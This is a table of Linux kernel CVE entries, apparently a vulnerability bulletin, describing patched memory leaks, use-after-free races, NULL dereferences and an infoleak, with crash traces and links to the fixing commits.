| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ksmbd: Fix memory leak in get_file_all_info() In get_file_all_info(), if vfs_getattr() fails, the function returns immediately without freeing the allocated filename, leading to a memory leak. Fix this by freeing the filename before returning in this error case. | 2026-01-23 | not yet calculated | CVE-2025-71153 | https://git.kernel.org/stable/c/5012b4c812230ae066902a00442708c999111183 https://git.kernel.org/stable/c/676907004256e0226c7ed3691db9f431404ca258 https://git.kernel.org/stable/c/d026f47db68638521df8543535ef863814fb01b1 https://git.kernel.org/stable/c/0c56693b06a68476ba113db6347e7897475f9e4c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: usb: rtl8150: fix memory leak on usb_submit_urb() failure In async_set_registers(), when usb_submit_urb() fails, the allocated async_req structure and URB are not freed, causing a memory leak. The completion callback async_set_reg_cb() is responsible for freeing these allocations, but it is only called after the URB is successfully submitted and completes (successfully or with error). If submission fails, the callback never runs and the memory is leaked. Fix this by freeing both the URB and the request structure in the error path when usb_submit_urb() fails. | 2026-01-23 | not yet calculated | CVE-2025-71154 | https://git.kernel.org/stable/c/a4e2442d3c48355a84463342f397134f149936d7 https://git.kernel.org/stable/c/2f966186b99550e3c665dbfb87b8314e30acea02 https://git.kernel.org/stable/c/db2244c580540306d60ce783ed340190720cd429 https://git.kernel.org/stable/c/4bd4ea3eb326608ffc296db12c105f92dc2f2190 https://git.kernel.org/stable/c/6492ad6439ff1a479fc94dc6052df3628faed8b6 https://git.kernel.org/stable/c/151403e903840c9cf06754097b6732c14f26c532 https://git.kernel.org/stable/c/12cab1191d9890097171156d06bfa8d31f1e39c8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: s390: Fix gmap_helper_zap_one_page() again A few checks were missing in gmap_helper_zap_one_page(), which can lead to memory corruption in the guest under specific circumstances. Add the missing checks. | 2026-01-23 | not yet calculated | CVE-2025-71155 | https://git.kernel.org/stable/c/2af2abbcbf8573100288e8f8aea2dab8a2a0ceb7 https://git.kernel.org/stable/c/2f393c228cc519ddf19b8c6c05bf15723241aa96 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gve: defer interrupt enabling until NAPI registration Currently, interrupts are automatically enabled immediately upon request. This allows interrupt to fire before the associated NAPI context is fully initialized and cause failures like below: [ 0.946369] Call Trace: [ 0.946369] <IRQ> [ 0.946369] __napi_poll+0x2a/0x1e0 [ 0.946369] net_rx_action+0x2f9/0x3f0 [ 0.946369] handle_softirqs+0xd6/0x2c0 [ 0.946369] ? handle_edge_irq+0xc1/0x1b0 [ 0.946369] __irq_exit_rcu+0xc3/0xe0 [ 0.946369] common_interrupt+0x81/0xa0 [ 0.946369] </IRQ> [ 0.946369] <TASK> [ 0.946369] asm_common_interrupt+0x22/0x40 [ 0.946369] RIP: 0010:pv_native_safe_halt+0xb/0x10 Use the `IRQF_NO_AUTOEN` flag when requesting interrupts to prevent auto enablement and explicitly enable the interrupt in NAPI initialization path (and disable it during NAPI teardown). This ensures that interrupt lifecycle is strictly coupled with readiness of NAPI context. | 2026-01-23 | not yet calculated | CVE-2025-71156 | https://git.kernel.org/stable/c/f5b7f49bd2377916ad57cbd1210c61196daff013 https://git.kernel.org/stable/c/48f9277680925e1a8623d6b2c50aadb7af824ace https://git.kernel.org/stable/c/3d970eda003441f66551a91fda16478ac0711617 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() Since nldev_deldev() (introduced by commit 060c642b2ab8 ("RDMA/nldev: Add support to add/delete a sub IB device through netlink") grabs a reference using ib_device_get_by_index() before calling ib_del_sub_device_and_put(), we need to drop that reference before returning -EOPNOTSUPP error. | 2026-01-23 | not yet calculated | CVE-2025-71157 | https://git.kernel.org/stable/c/20436f2742a92b7afeb2504eb559a98d2196b001 https://git.kernel.org/stable/c/fe8d456080423b9ed410469fbd1e2098d3acce2b https://git.kernel.org/stable/c/fa3c411d21ebc26ffd175c7256c37cefa35020aa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: gpio: mpsse: ensure worker is torn down When an IRQ worker is running, unplugging the device would cause a crash. The sealevel hardware this driver was written for was not hotpluggable, so I never realized it. This change uses a spinlock to protect a list of workers, which it tears down on disconnect. | 2026-01-23 | not yet calculated | CVE-2025-71158 | https://git.kernel.org/stable/c/472d900c8bcac301ae0e40fdca7db799bd989ff5 https://git.kernel.org/stable/c/179ef1127d7a4f09f0e741fa9f30b8a8e7886271 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix use-after-free warning in btrfs_get_or_create_delayed_node() Previously, btrfs_get_or_create_delayed_node() set the delayed_node's refcount before acquiring the root->delayed_nodes lock. Commit e8513c012de7 ("btrfs: implement ref_tracker for delayed_nodes") moved refcount_set inside the critical section, which means there is no longer a memory barrier between setting the refcount and setting btrfs_inode->delayed_node. Without that barrier, the stores to node->refs and btrfs_inode->delayed_node may become visible out of order. Another thread can then read btrfs_inode->delayed_node and attempt to increment a refcount that hasn't been set yet, leading to a refcounting bug and a use-after-free warning. The fix is to move refcount_set back to where it was to take advantage of the implicit memory barrier provided by lock acquisition. Because the allocations now happen outside of the lock's critical section, they can use GFP_NOFS instead of GFP_ATOMIC. | 2026-01-23 | not yet calculated | CVE-2025-71159 | https://git.kernel.org/stable/c/c8385851a5435f4006281828d428e5d0b0bbf8af https://git.kernel.org/stable/c/83f59076a1ae6f5c6845d6f7ed3a1a373d883684 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: avoid chain re-validation if possible Hamza Mahfooz reports cpu soft lock-ups in nft_chain_validate(): watchdog: BUG: soft lockup - CPU#1 stuck for 27s! [iptables-nft-re:37547] [..] RIP: 0010:nft_chain_validate+0xcb/0x110 [nf_tables] [..] nft_immediate_validate+0x36/0x50 [nf_tables] nft_chain_validate+0xc9/0x110 [nf_tables] nft_immediate_validate+0x36/0x50 [nf_tables] nft_chain_validate+0xc9/0x110 [nf_tables] nft_immediate_validate+0x36/0x50 [nf_tables] nft_chain_validate+0xc9/0x110 [nf_tables] nft_immediate_validate+0x36/0x50 [nf_tables] nft_chain_validate+0xc9/0x110 [nf_tables] nft_immediate_validate+0x36/0x50 [nf_tables] nft_chain_validate+0xc9/0x110 [nf_tables] nft_immediate_validate+0x36/0x50 [nf_tables] nft_chain_validate+0xc9/0x110 [nf_tables] nft_immediate_validate+0x36/0x50 [nf_tables] nft_chain_validate+0xc9/0x110 [nf_tables] nft_table_validate+0x6b/0xb0 [nf_tables] nf_tables_validate+0x8b/0xa0 [nf_tables] nf_tables_commit+0x1df/0x1eb0 [nf_tables] [..] Currently nf_tables will traverse the entire table (chain graph), starting from the entry points (base chains), exploring all possible paths (chain jumps). But there are cases where we could avoid revalidation. Consider: 1 input -> j2 -> j3 2 input -> j2 -> j3 3 input -> j1 -> j2 -> j3 Then the second rule does not need to revalidate j2, and, by extension j3, because this was already checked during validation of the first rule. We need to validate it only for rule 3. This is needed because chain loop detection also ensures we do not exceed the jump stack: Just because we know that j2 is cycle free, its last jump might now exceed the allowed stack size. We also need to update all reachable chains with the new largest observed call depth. Care has to be taken to revalidate even if the chain depth won't be an issue: chain validation also ensures that expressions are not called from invalid base chains. For example, the masquerade expression can only be called from NAT postrouting base chains. Therefore we also need to keep record of the base chain context (type, hooknum) and revalidate if the chain becomes reachable from a different hook location. | 2026-01-23 | not yet calculated | CVE-2025-71160 | https://git.kernel.org/stable/c/53de1e6cde8f9b791d9cf61aa0e7b02cf5bbe8b1 https://git.kernel.org/stable/c/14fa3d1927f1382f86e3f70a51f26005c8e3cff6 https://git.kernel.org/stable/c/09d6074995c186e449979fe6c1b0f1a69cf9bd3b https://git.kernel.org/stable/c/8e1a1bc4f5a42747c08130b8242ebebd1210b32f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm-verity: disable recursive forward error correction There are two problems with the recursive correction: 1. It may cause denial-of-service. In fec_read_bufs, there is a loop that has 253 iterations. For each iteration, we may call verity_hash_for_block recursively. There is a limit of 4 nested recursions - that means that there may be at most 253^4 (4 billion) iterations. Red Hat QE team actually created an image that pushes dm-verity to this limit - and this image just makes the udev-worker process get stuck in the 'D' state. 2. It doesn't work. In fec_read_bufs we store data into the variable "fio->bufs", but fio bufs is shared between recursive invocations, if "verity_hash_for_block" invoked correction recursively, it would overwrite partially filled fio->bufs. | 2026-01-23 | not yet calculated | CVE-2025-71161 | https://git.kernel.org/stable/c/232948cf600fba69aff36b25d85ef91a73a35756 https://git.kernel.org/stable/c/d9f3e47d3fae0c101d9094bc956ed24e7a0ee801 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: tegra-adma: Fix use-after-free A use-after-free bug exists in the Tegra ADMA driver when audio streams are terminated, particularly during XRUN conditions. The issue occurs when the DMA buffer is freed by tegra_adma_terminate_all() before the vchan completion tasklet finishes accessing it. The race condition follows this sequence: 1. DMA transfer completes, triggering an interrupt that schedules the completion tasklet (tasklet has not executed yet) 2. Audio playback stops, calling tegra_adma_terminate_all() which frees the DMA buffer memory via kfree() 3. The scheduled tasklet finally executes, calling vchan_complete() which attempts to access the already-freed memory Since tasklets can execute at any time after being scheduled, there is no guarantee that the buffer will remain valid when vchan_complete() runs. Fix this by properly synchronizing the virtual channel completion: - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the descriptors as terminated instead of freeing the descriptor. - Add the callback tegra_adma_synchronize() that calls vchan_synchronize() which kills any pending tasklets and frees any terminated descriptors. Crash logs: [ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0 [ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0 [ 337.427562] Call trace: [ 337.427564] dump_backtrace+0x0/0x320 [ 337.427571] show_stack+0x20/0x30 [ 337.427575] dump_stack_lvl+0x68/0x84 [ 337.427584] print_address_description.constprop.0+0x74/0x2b8 [ 337.427590] kasan_report+0x1f4/0x210 [ 337.427598] __asan_load8+0xa0/0xd0 [ 337.427603] vchan_complete+0x124/0x3b0 [ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0 [ 337.427617] tasklet_action+0x30/0x40 [ 337.427623] __do_softirq+0x1a0/0x5c4 [ 337.427628] irq_exit+0x110/0x140 [ 337.427633] handle_domain_irq+0xa4/0xe0 [ 337.427640] gic_handle_irq+0x64/0x160 [ 337.427644] call_on_irq_stack+0x20/0x4c [ 337.427649] do_interrupt_handler+0x7c/0x90 [ 337.427654] el1_interrupt+0x30/0x80 [ 337.427659] el1h_64_irq_handler+0x18/0x30 [ 337.427663] el1h_64_irq+0x7c/0x80 [ 337.427667] cpuidle_enter_state+0xe4/0x540 [ 337.427674] cpuidle_enter+0x54/0x80 [ 337.427679] do_idle+0x2e0/0x380 [ 337.427685] cpu_startup_entry+0x2c/0x70 [ 337.427690] rest_init+0x114/0x130 [ 337.427695] arch_call_rest_init+0x18/0x24 [ 337.427702] start_kernel+0x380/0x3b4 [ 337.427706] __primary_switched+0xc0/0xc8 | 2026-01-25 | not yet calculated | CVE-2025-71162 | https://git.kernel.org/stable/c/cb2c9c4bb1322cc3c9984ad17db8cdd2663879ca https://git.kernel.org/stable/c/be655c3736b3546f39bc8116ffbf2a3b6cac96c4 https://git.kernel.org/stable/c/2efd07a7c36949e6fa36a69183df24d368bf9e96 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: idxd: fix device leaks on compat bind and unbind Make sure to drop the reference taken when looking up the idxd device as part of the compat bind and unbind sysfs interface. | 2026-01-25 | not yet calculated | CVE-2025-71163 | https://git.kernel.org/stable/c/0c97ff108f825a70c3bb29d65ddf0a013d231bb9 https://git.kernel.org/stable/c/a7226fd61def74b60dd8e47ec84cabafc39d575b https://git.kernel.org/stable/c/799900f01792cf8b525a44764f065f83fcafd468 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset `qfq_class->leaf_qdisc->q.qlen > 0` does not imply that the class itself is active. Two qfq_class objects may point to the same leaf_qdisc. This happens when: 1. one QFQ qdisc is attached to the dev as the root qdisc, and 2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get() / qdisc_put()) and is pending to be destroyed, as in function tc_new_tfilter. When packets are enqueued through the root QFQ qdisc, the shared leaf_qdisc->q.qlen increases. At the same time, the second QFQ qdisc triggers qdisc_put and qdisc_destroy: the qdisc enters qfq_reset() with its own q->q.qlen == 0, but its class's leaf qdisc->q.qlen > 0. Therefore, the qfq_reset would wrongly deactivate an inactive aggregate and trigger a null-deref in qfq_deactivate_agg: [ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000 [ 0.903571] #PF: supervisor write access in kernel mode [ 0.903860] #PF: error_code(0x0002) - not-present page [ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0 [ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI [ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE [ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014 [ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2)) [ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0 Code starting with the faulting instruction =========================================== 0: 0f 84 4d 01 00 00 je 0x153 6: 48 89 70 18 mov %rsi,0x18(%rax) a: 8b 4b 10 mov 0x10(%rbx),%ecx d: 48 c7 c2 ff ff ff ff mov $0xffffffffffffffff,%rdx 14: 48 8b 78 08 mov 0x8(%rax),%rdi 18: 48 d3 e2 shl %cl,%rdx 1b: 48 21 f2 and %rsi,%rdx 1e: 48 2b 13 sub (%rbx),%rdx 21: 48 8b 30 mov (%rax),%rsi 24: 48 d3 ea shr %cl,%rdx 27: 8b 4b 18 mov 0x18(%rbx),%ecx ... [ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246 [ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000 [ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000 [ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000 [ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000 [ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880 [ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000 [ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0 [ 0.910247] PKRU: 55555554 [ 0.910391] Call Trace: [ 0.910527] <TASK> [ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485) [ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036) [ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076) [ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447) [ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958) [ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861) [ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550) [ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344) [ 0.912296] ? __alloc_skb (net/core/skbuff.c:706) [ 0.912484] netlink_sendmsg (net/netlink/af ---truncated--- | 2026-01-21 | not yet calculated | CVE-2026-22976 | https://git.kernel.org/stable/c/6116a83ec167d3ab1390cded854d237481f41b63 https://git.kernel.org/stable/c/0809c4bc06c9c961222df29f2eccfd449304056f https://git.kernel.org/stable/c/cdb24200b043438a144df501f1ebbd926bb1a2c7 https://git.kernel.org/stable/c/11bf9134613f6c71fc0ff36c5d8d33856f6ae3bb https://git.kernel.org/stable/c/43497313d0da3e12b5cfcd97aa17bf48ee663f95 https://git.kernel.org/stable/c/51ffd447bc37bf1a5776b85523f51d2bc69977f6 https://git.kernel.org/stable/c/c1d73b1480235731e35c81df70b08f4714a7d095 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: sock: fix hardened usercopy panic in sock_recv_errqueue skbuff_fclone_cache was created without defining a usercopy region, [1] unlike skbuff_head_cache which properly whitelists the cb[] field. [2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is enabled and the kernel attempts to copy sk_buff.cb data to userspace via sock_recv_errqueue() -> put_cmsg(). The crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone() (from skbuff_fclone_cache) [1] 2. The skb is cloned via skb_clone() using the pre-allocated fclone [3] 3. The cloned skb is queued to sk_error_queue for timestamp reporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE) 5. sock_recv_errqueue() calls put_cmsg() to copy serr->ee from skb->cb [4] 6. __check_heap_object() fails because skbuff_fclone_cache has no usercopy whitelist [5] When cloned skbs allocated from skbuff_fclone_cache are used in the socket error queue, accessing the sock_exterr_skb structure in skb->cb via put_cmsg() triggers a usercopy hardening violation: [ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object 'skbuff_fclone_cache' (offset 296, size 16)! [ 5.382796] kernel BUG at mm/usercopy.c:102! [ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI [ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7 [ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80 [ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff <0f> 0b 490 [ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246 [ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74 [ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0 [ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74 [ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001 [ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00 [ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000 [ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0 [ 5.384903] PKRU: 55555554 [ 5.384903] Call Trace: [ 5.384903] <TASK> [ 5.384903] __check_heap_object+0x9a/0xd0 [ 5.384903] __check_object_size+0x46c/0x690 [ 5.384903] put_cmsg+0x129/0x5e0 [ 5.384903] sock_recv_errqueue+0x22f/0x380 [ 5.384903] tls_sw_recvmsg+0x7ed/0x1960 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5.384903] ? schedule+0x6d/0x270 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 [ 5.384903] ? mutex_unlock+0x81/0xd0 [ 5.384903] ? __pfx_mutex_unlock+0x10/0x10 [ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10 [ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0 [ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40 [ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5 The crash offset 296 corresponds to skb2->cb within skbuff_fclones: - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 - offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 = 272 + 24 (inside sock_exterr_skb.ee) This patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure. [1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885 [2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104 [3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566 [4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491 [5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719 | 2026-01-21 | not yet calculated | CVE-2026-22977 | https://git.kernel.org/stable/c/88dd6be7ebb3153b662c2cebcb06e032a92857f5 https://git.kernel.org/stable/c/c655d2167bf014d4c61b4faeca59b60ff9b9f6b1 https://git.kernel.org/stable/c/8c6901aa29626e35045130bac09b75f791acca85 https://git.kernel.org/stable/c/582a5e922a9652fcbb7d0165c95d5b20aa37575d https://git.kernel.org/stable/c/005671c60fcf1dbdb8bddf12a62568fd5e4ec391 https://git.kernel.org/stable/c/e00b169eaac5f7cdbf710c354c8fa76d02009115 https://git.kernel.org/stable/c/2a71a1a8d0ed718b1c7a9ac61f07e5755c47ae20 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: avoid kernel-infoleak from struct iw_point struct iw_point has a 32bit hole on 64bit arches. struct iw_point { void __user *pointer; /* Pointer to the data (in user space) */ __u16 length; /* number of fields or size in bytes */ __u16 flags; /* Optional params */ }; Make sure to zero the structure to avoid disclosing 32bits of kernel data to user space. | 2026-01-23 | not yet calculated | CVE-2026-22978 | https://git.kernel.org/stable/c/d943b5f592767b107ba8c12a902f17431350378c https://git.kernel.org/stable/c/a3827e310b5a73535646ef4a552d53b3c8bf74f6 https://git.kernel.org/stable/c/442ceac0393185e9982323f6682a52a53e8462b1 https://git.kernel.org/stable/c/d21ec867d84c9f3a9845d7d8c90c9ce35dbe48f8 https://git.kernel.org/stable/c/024f71a57d563fbe162e528c8bf2d27e9cac7c7b https://git.kernel.org/stable/c/e3c35177103ead4658b8a62f41e3080d45885464 https://git.kernel.org/stable/c/21cbf883d073abbfe09e3924466aa5e0449e7261 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: fix memory leak in skb_segment_list for GRO packets When skb_segment_list() is called during packet forwarding, it handles packets that were aggregated by the GRO engine. Historically, the segmentation logic in skb_segment_list assumes that individual segments are split from a parent SKB and may need to carry their own socket memory accounting. Accordingly, the code transfers truesize from the parent to the newly created segments. Prior to commit ed4cccef64c1 ("gro: fix ownership transfer"), this truesize subtraction in skb_segment_list() was valid because fragments still carry a reference to the original socket. However, commit ed4cccef64c1 ("gro: fix ownership transfer") changed this behavior by ensuring that fraglist entries are explicitly orphaned (skb->sk = NULL) to prevent illegal orphaning later in the stack. This change meant that the entire socket memory charge remained with the head SKB, but the corresponding accounting logic in skb_segment_list() was never updated. As a result, the current code unconditionally adds each fragment's truesize to delta_truesize and subtracts it from the parent SKB. Since the fragments are no longer charged to the socket, this subtraction results in an effective under-count of memory when the head is freed. This causes sk_wmem_alloc to remain non-zero, preventing socket destruction and leading to a persistent memory leak. The leak can be observed via KMEMLEAK when tearing down the networking environment: unreferenced object 0xffff8881e6eb9100 (size 2048): comm "ping", pid 6720, jiffies 4295492526 backtrace: kmem_cache_alloc_noprof+0x5c6/0x800 sk_prot_alloc+0x5b/0x220 sk_alloc+0x35/0xa00 inet6_create.part.0+0x303/0x10d0 __sock_create+0x248/0x640 __sys_socket+0x11b/0x1d0 Since skb_segment_list() is exclusively used for SKB_GSO_FRAGLIST packets constructed by GRO, the truesize adjustment is removed. The call to skb_release_head_state() must be preserved. As documented in commit cf673ed0e057 ("net: fix fraglist segmentation reference count leak"), it is still required to correctly drop references to SKB extensions that may be overwritten during __copy_skb_header(). | 2026-01-23 | not yet calculated | CVE-2026-22979 | https://git.kernel.org/stable/c/0b27828ebd1ed3107d7929c3737adbe862e99e74 https://git.kernel.org/stable/c/88bea149db2057112af3aaf63534b24fab5858ab https://git.kernel.org/stable/c/3264881431e308b9c72cb8a0159d57a56d67dd79 https://git.kernel.org/stable/c/c114a32a2e70b82d447f409f7ffcfa3058f9d5bd https://git.kernel.org/stable/c/238e03d0466239410b72294b79494e43d4fabe77 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: provide locking for v4_end_grace Writing to v4_end_grace can race with server shutdown and result in memory being accessed after it was freed - reclaim_str_hashtbl in particular. We cannot hold nfsd_mutex across the nfsd4_end_grace() call as that is held while client_tracking_op->init() is called and that can wait for an upcall to nfsdcltrack which can write to v4_end_grace, resulting in a deadlock. nfsd4_end_grace() is also called by the laundromat work queue and this doesn't require locking as server shutdown will stop the work and wait for it before freeing anything that nfsd4_end_grace() might access. However, we must be sure that writing to v4_end_grace doesn't restart the work item after shutdown has already waited for it. For this we add a new flag protected with nn->client_lock. It is set only while it is safe to make client tracking calls, and v4_end_grace only schedules work while the flag is set with the spinlock held. So this patch adds a nfsd_net field "client_tracking_active" which is set as described. Another field "grace_end_forced", is set when v4_end_grace is written. After this is set, and providing client_tracking_active is set, the laundromat is scheduled. This "grace_end_forced" field bypasses other checks for whether the grace period has finished. This resolves a race which can result in use-after-free. | 2026-01-23 | not yet calculated | CVE-2026-22980 | https://git.kernel.org/stable/c/ca97360860eb02e3ae4ba42c19b439a0fcecbf06 https://git.kernel.org/stable/c/e8bfa2401d4c51eca6e48e9b33c798828ca9df61 https://git.kernel.org/stable/c/34eb22836e0cdba093baac66599d68c4cd245a9d https://git.kernel.org/stable/c/06600719d0f7a723811c45e4d51f5b742f345309 https://git.kernel.org/stable/c/ba4811c8b433bfa681729ca42cc62b6034f223b0 https://git.kernel.org/stable/c/53f07d095e7e680c5e4569a55a019f2c0348cdc6 https://git.kernel.org/stable/c/2857bd59feb63fcf40fe4baf55401baea6b4feb4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: idpf: detach and close netdevs while handling a reset Protect the reset path from callbacks by setting the netdevs to detached state and close any netdevs in UP state until the reset handling has completed. During a reset, the driver will de-allocate resources for the vport, and there is no guarantee that those will recover, which is why the existing vport_ctrl_lock does not provide sufficient protection. idpf_detach_and_close() is called right before reset handling. If the reset handling succeeds, the netdevs state is recovered via call to idpf_attach_and_open(). If the reset handling fails the netdevs remain down. The detach/down calls are protected with RTNL lock to avoid racing with callbacks. On the recovery side the attach can be done without holding the RTNL lock as there are no callbacks expected at that point, due to detach/close always being done first in that flow. The previous logic restoring the netdevs state based on the IDPF_VPORT_UP_REQUESTED flag in the init task is not needed anymore, hence the removal of idpf_set_vport_state(). The IDPF_VPORT_UP_REQUESTED is still being used to restore the state of the netdevs following the reset, but has no use outside of the reset handling flow. idpf_init_hard_reset() is converted to void, since it was used as such and there is no error handling being done based on its return value. Before this change, invoking hard and soft resets simultaneously will cause the driver to lose the vport state: ip -br a <inf> UP echo 1 > /sys/class/net/ens801f0/device/reset& \ ethtool -L ens801f0 combined 8 ip -br a <inf> DOWN ip link set <inf> up ip -br a <inf> DOWN Also in case of a failure in the reset path, the netdev is left exposed to external callbacks, while vport resources are not initialized, leading to a crash on subsequent ifup/down: [408471.398966] idpf 0000:83:00.0: HW reset detected [408471.411744] idpf 0000:83:00.0: Device HW Reset initiated [408472.277901] idpf 0000:83:00.0: The driver was unable to contact the device's firmware. Check that the FW is running. Driver state= 0x2 [408508.125551] BUG: kernel NULL pointer dereference, address: 0000000000000078 [408508.126112] #PF: supervisor read access in kernel mode [408508.126687] #PF: error_code(0x0000) - not-present page [408508.127256] PGD 2aae2f067 P4D 0 [408508.127824] Oops: Oops: 0000 [#1] SMP NOPTI ... [408508.130871] RIP: 0010:idpf_stop+0x39/0x70 [idpf] ... [408508.139193] Call Trace: [408508.139637] <TASK> [408508.140077] __dev_close_many+0xbb/0x260 [408508.140533] __dev_change_flags+0x1cf/0x280 [408508.140987] netif_change_flags+0x26/0x70 [408508.141434] dev_change_flags+0x3d/0xb0 [408508.141878] devinet_ioctl+0x460/0x890 [408508.142321] inet_ioctl+0x18e/0x1d0 [408508.142762] ? _copy_to_user+0x22/0x70 [408508.143207] sock_do_ioctl+0x3d/0xe0 [408508.143652] sock_ioctl+0x10e/0x330 [408508.144091] ? find_held_lock+0x2b/0x80 [408508.144537] __x64_sys_ioctl+0x96/0xe0 [408508.144979] do_syscall_64+0x79/0x3d0 [408508.145415] entry_SYSCALL_64_after_hwframe+0x76/0x7e [408508.145860] RIP: 0033:0x7f3e0bb4caff | 2026-01-23 | not yet calculated | CVE-2026-22981 | https://git.kernel.org/stable/c/ac122f5fb050903b3d262001562c452be95eaf70 https://git.kernel.org/stable/c/2e281e1155fc476c571c0bd2ffbfe28ab829a5c3 |
